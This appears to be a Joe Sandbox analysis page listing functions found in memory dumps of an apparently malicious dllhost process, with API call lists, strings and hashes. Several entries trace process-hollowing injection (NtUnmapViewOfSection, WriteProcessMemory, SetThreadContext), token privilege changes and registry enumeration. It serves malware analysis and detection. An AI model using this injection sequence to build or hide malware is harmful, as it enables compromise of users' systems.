Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 333a489e8dcc8eedcd0e7bef734eff4b78bc2a86995d597fe8532a0c7997e2df
Instruction ID: 899f326030a30a20e0b98c617e46ebe9c2641ac0e54861ab3f05272fc3d7827e
Opcode Fuzzy Hash: 333a489e8dcc8eedcd0e7bef734eff4b78bc2a86995d597fe8532a0c7997e2df
Instruction Fuzzy Hash: D3E0EC78F016C042FF1867B2D8553AC01A37BD9765F8CC43CBE0A822E7F91984938250

Function 000001EF091F2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000001EF091F302E

Memory Dump Source

Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 0850b86c745a97c39c9faefd0703bc2872dc2d22f4bcb5242e16983652158e04
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 6991F873B0159887EB548F25D4207BDB392F794BD4F5C8139AE6A4778AEA34D813C710

Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1

ExitProcess.KERNEL32 ref: 0000000140002D43

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
String ID:
API String ID: 3805535264-0
Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

Non-executed Functions

Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317injectionthreadmemoryCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 000000014000252A
VirtualAllocEx.KERNEL32 ref: 0000000140002581
WriteProcessMemory.KERNEL32 ref: 00000001400025A9
VirtualProtectEx.KERNEL32 ref: 00000001400025D4
WriteProcessMemory.KERNEL32 ref: 0000000140002613
VirtualProtectEx.KERNEL32 ref: 000000014000265D
VirtualAlloc.KERNEL32 ref: 0000000140002693
GetThreadContext.KERNEL32 ref: 00000001400026B6
WriteProcessMemory.KERNEL32 ref: 00000001400026E1
SetThreadContext.KERNEL32 ref: 0000000140002704
ResumeThread.KERNEL32 ref: 0000000140002717
VirtualAllocEx.KERNEL32 ref: 0000000140002759
WriteProcessMemory.KERNEL32 ref: 0000000140002781
VirtualProtectEx.KERNEL32 ref: 00000001400027AB
WriteProcessMemory.KERNEL32 ref: 00000001400027EA
VirtualProtectEx.KERNEL32 ref: 0000000140002834
VirtualAlloc.KERNEL32 ref: 0000000140002869
Wow64GetThreadContext.KERNEL32 ref: 0000000140002887
WriteProcessMemory.KERNEL32 ref: 00000001400028AC
Wow64SetThreadContext.KERNEL32 ref: 00000001400028CA
OpenProcess.KERNEL32 ref: 00000001400028E6
TerminateProcess.KERNEL32 ref: 00000001400028F6

Part of subcall function 00000001400020CC: GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
Part of subcall function 00000001400020CC: GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

NtUnmapViewOfSection, xrefs: 000000014000253C
h, xrefs: 00000001400024EE
RtlGetVersion, xrefs: 000000014000249B
@, xrefs: 0000000140002751

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
API String ID: 1036100660-1371749706
Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04

Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
GetProcessHeap.KERNEL32 ref: 00000001400012DF
HeapAlloc.KERNEL32 ref: 00000001400012F0
RegEnumValueW.ADVAPI32 ref: 000000014000134F
StrCmpIW.SHLWAPI ref: 0000000140001388
StrCmpW.SHLWAPI ref: 0000000140001390
GetProcessHeap.KERNEL32 ref: 00000001400013C7
HeapAlloc.KERNEL32 ref: 00000001400013D5
GetProcessHeap.KERNEL32 ref: 00000001400013F2
HeapFree.KERNEL32 ref: 0000000140001400
lstrlenW.KERNEL32 ref: 0000000140001409
GetProcessHeap.KERNEL32 ref: 0000000140001417
HeapAlloc.KERNEL32 ref: 0000000140001425
StrCpyW.SHLWAPI ref: 0000000140001447
GetProcessHeap.KERNEL32 ref: 000000014000145E
HeapFree.KERNEL32 ref: 000000014000146C

Strings

d, xrefs: 0000000140001312

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710

Function 000001EF09222FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001EF09223094
lstrlenW.KERNEL32 ref: 000001EF092232BE

Part of subcall function 000001EF09221A30: OpenProcess.KERNEL32 ref: 000001EF09221A56
Part of subcall function 000001EF09221A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001EF09221A74
Part of subcall function 000001EF09221A30: PathFindFileNameW.SHLWAPI ref: 000001EF09221A83
Part of subcall function 000001EF09221A30: lstrlenW.KERNEL32 ref: 000001EF09221A8F
Part of subcall function 000001EF09221A30: StrCpyW.SHLWAPI ref: 000001EF09221AA2
Part of subcall function 000001EF09221A30: CloseHandle.KERNEL32 ref: 000001EF09221AB0

GetProcAddress.KERNEL32 ref: 000001EF092230A9

Part of subcall function 000001EF09223F88: StrCmpNIW.SHLWAPI(?,?,?,000001EF0922272F), ref: 000001EF09223FA0

StrCmpNIW.SHLWAPI ref: 000001EF092230EC
lstrlenW.KERNEL32 ref: 000001EF09223214

Strings

NtQueryObject, xrefs: 000001EF0922309F
\Device\Nsi, xrefs: 000001EF092230DF
ntdll.dll, xrefs: 000001EF0922308D

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 8670bdbb8ae2e7a4211c347d347ec83acc948b2d36ee9ed52bdec45eade8d9ce
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: B3B15A322106D1A2EB64CF25D5407EDA3A6F784F94F58502EFE0953B9AEE39CD82C340

Function 000001EF09422FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001EF09423094
lstrlenW.KERNEL32 ref: 000001EF094232BE

Part of subcall function 000001EF09421A30: OpenProcess.KERNEL32 ref: 000001EF09421A56
Part of subcall function 000001EF09421A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001EF09421A74
Part of subcall function 000001EF09421A30: PathFindFileNameW.SHLWAPI ref: 000001EF09421A83
Part of subcall function 000001EF09421A30: lstrlenW.KERNEL32 ref: 000001EF09421A8F
Part of subcall function 000001EF09421A30: StrCpyW.SHLWAPI ref: 000001EF09421AA2
Part of subcall function 000001EF09421A30: CloseHandle.KERNEL32 ref: 000001EF09421AB0

GetProcAddress.KERNEL32 ref: 000001EF094230A9

Part of subcall function 000001EF09423F88: StrCmpNIW.SHLWAPI(?,?,?,000001EF0942272F), ref: 000001EF09423FA0

StrCmpNIW.SHLWAPI ref: 000001EF094230EC
lstrlenW.KERNEL32 ref: 000001EF09423214

Strings

NtQueryObject, xrefs: 000001EF0942309F
\Device\Nsi, xrefs: 000001EF094230DF
ntdll.dll, xrefs: 000001EF0942308D

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 1a80193d0f766137850bae72ad27f196f2d891f583836e1d2d3e11538b004712
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 72B14F392106D182EB549F25D5507EDA3B6F784FA4F98D02EFE0953796EE3AC942C340

Function 000001EF092284B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001EF092284CC
RtlCaptureContext.NTDLL ref: 000001EF092284F9
RtlLookupFunctionEntry.NTDLL ref: 000001EF09228513
RtlVirtualUnwind.NTDLL ref: 000001EF09228554
IsDebuggerPresent.KERNEL32 ref: 000001EF092285A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001EF092285C5
UnhandledExceptionFilter.KERNEL32 ref: 000001EF092285D0

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: cc2f18b715ae0725f4f8f33b901043d34b9f09f9d86957c9bf601e549c62b32f
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 4E315C72205BC096EB609F60E8907EE7365F784744F48802EEE4E47B9AEF38C649C710

Function 000001EF094284B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001EF094284CC
RtlCaptureContext.NTDLL ref: 000001EF094284F9
RtlLookupFunctionEntry.NTDLL ref: 000001EF09428513
RtlVirtualUnwind.NTDLL ref: 000001EF09428554
IsDebuggerPresent.KERNEL32 ref: 000001EF094285A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001EF094285C5
UnhandledExceptionFilter.KERNEL32 ref: 000001EF094285D0

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 42ca6ea816dedf3d30fb0ab1e63030c1245a70ea3a05e434282cdae36b03163b
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: D631197A205BC086EB648F61E8503ED6365F784758F48C42EEE4E47B96EF78C649CB10

Function 000001EF0922CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001EF0922CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001EF0922CE23
RtlVirtualUnwind.NTDLL ref: 000001EF0922CE5E
IsDebuggerPresent.KERNEL32 ref: 000001EF0922CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001EF0922CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001EF0922CEAC

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: e68e29e1ce493148a9ae8fda2822f3e6ca330f4f24bf30bbeedeecc665089977
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: C6411A36214BC096EB60CB25E8407EE73A5F7C8754F584129FE9D46B9AEF38C556CB00

Function 000001EF0942CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001EF0942CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001EF0942CE23
RtlVirtualUnwind.NTDLL ref: 000001EF0942CE5E
IsDebuggerPresent.KERNEL32 ref: 000001EF0942CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001EF0942CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001EF0942CEAC

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: adc432bb5183885981e5b9bc7e981647834ee0baa15491edfdbf72a0d451b899
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 50412E3A214BC086E760CB25E8403DE73A5F7C8768F548129FE9D46B9AEF39C556CB00

Function 000001EF0922DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001EF0922DB99
FindNextFileW.KERNEL32 ref: 000001EF0922DCCF
FindClose.KERNEL32 ref: 000001EF0922DD0F
FindClose.KERNEL32 ref: 000001EF0922DD3B

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 25d19e3a0ddd5ecf0d27a2bc40df2c51fdd1c3fcfd07469240084c2abf61e716
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 29A1C4327046C069FB209B75E4547ED6BA2E7C5B94F184139FE992BADBEA78C443C700

Function 000001EF0942DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001EF0942DB99
FindNextFileW.KERNEL32 ref: 000001EF0942DCCF
FindClose.KERNEL32 ref: 000001EF0942DD0F
FindClose.KERNEL32 ref: 000001EF0942DD3B

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 0405d07f92dc22dfe0be189a9cda41fcdb696dce3d09bf687db287bad1766575
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 47A1E636B146C049FB209B75D4543ED6BA2B7C17B4F98C139BE59276DAEA35C443C700

Function 000001EF09221724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF0922172F
HeapAlloc.KERNEL32 ref: 000001EF0922173E

Part of subcall function 000001EF09221264: GetProcessHeap.KERNEL32 ref: 000001EF0922126A
Part of subcall function 000001EF09221264: HeapAlloc.KERNEL32 ref: 000001EF09221279
Part of subcall function 000001EF09221264: GetProcessHeap.KERNEL32 ref: 000001EF09221293
Part of subcall function 000001EF09221264: HeapAlloc.KERNEL32 ref: 000001EF092212A4

Part of subcall function 000001EF09221000: GetProcessHeap.KERNEL32 ref: 000001EF09221006
Part of subcall function 000001EF09221000: HeapAlloc.KERNEL32 ref: 000001EF09221015
Part of subcall function 000001EF09221000: GetProcessHeap.KERNEL32 ref: 000001EF09221028
Part of subcall function 000001EF09221000: HeapAlloc.KERNEL32 ref: 000001EF09221037

RegOpenKeyExW.ADVAPI32 ref: 000001EF092217AE
RegOpenKeyExW.ADVAPI32 ref: 000001EF092217DB
RegCloseKey.ADVAPI32 ref: 000001EF092217F5
RegOpenKeyExW.ADVAPI32 ref: 000001EF09221815
RegCloseKey.ADVAPI32 ref: 000001EF09221830
RegOpenKeyExW.ADVAPI32 ref: 000001EF09221850
RegCloseKey.ADVAPI32 ref: 000001EF0922186B
RegOpenKeyExW.ADVAPI32 ref: 000001EF0922188B
RegCloseKey.ADVAPI32 ref: 000001EF092218A6
RegOpenKeyExW.ADVAPI32 ref: 000001EF092218C6
RegCloseKey.ADVAPI32 ref: 000001EF092218E1
RegOpenKeyExW.ADVAPI32 ref: 000001EF09221901
RegCloseKey.ADVAPI32 ref: 000001EF0922191C
RegOpenKeyExW.ADVAPI32 ref: 000001EF0922193C
RegCloseKey.ADVAPI32 ref: 000001EF09221957
RegOpenKeyExW.ADVAPI32 ref: 000001EF09221977
RegCloseKey.ADVAPI32 ref: 000001EF09221992
RegCloseKey.ADVAPI32 ref: 000001EF0922199C

Part of subcall function 000001EF092212B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001EF09221315
Part of subcall function 000001EF092212B8: GetProcessHeap.KERNEL32 ref: 000001EF09221323
Part of subcall function 000001EF092212B8: HeapAlloc.KERNEL32 ref: 000001EF09221334
Part of subcall function 000001EF092212B8: RegEnumValueW.ADVAPI32 ref: 000001EF09221393
Part of subcall function 000001EF092212B8: GetProcessHeap.KERNEL32 ref: 000001EF092213DB
Part of subcall function 000001EF092212B8: HeapAlloc.KERNEL32 ref: 000001EF092213E9
Part of subcall function 000001EF092212B8: GetProcessHeap.KERNEL32 ref: 000001EF09221406
Part of subcall function 000001EF092212B8: HeapFree.KERNEL32 ref: 000001EF09221414
